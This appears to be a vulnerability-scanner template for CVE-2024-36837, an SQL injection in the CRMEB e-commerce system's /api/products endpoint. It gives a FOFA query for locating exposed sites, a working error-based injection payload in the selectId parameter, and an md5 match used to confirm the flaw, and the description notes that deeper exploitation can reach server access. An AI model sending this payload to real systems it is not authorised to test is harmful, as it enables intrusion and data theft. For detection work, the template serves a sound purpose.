漏洞描述
fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单.
id: CVE-2024-36837
info:
name: CRMEB开源电商系统 /api/products SQL注入漏洞(CVE-2024-36837)
author: fkalis
severity: high
description: |-
fofa: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
该漏洞可以通过请求api的路径接口来进行SQL注入,进而可能导致敏感信息泄露,该注入可暴露后台web绝对路径,深入利用可获取服务器权限,该漏洞无前置条件且利用简单.
reference:
- https://www.seebug.org/vuldb/ssvid-99852
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/CVE-2024-36837%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md
tags: crmeb,sqli,cve,cve2024
created: 2024/12/25
rules:
r0:
request:
method: GET
path: /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(123123)))),0x7e),3550)
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
expression: response.status == 200 && response.body.bcontains(b'4297f44b13955235245b2497399d7a93')
expression: r0()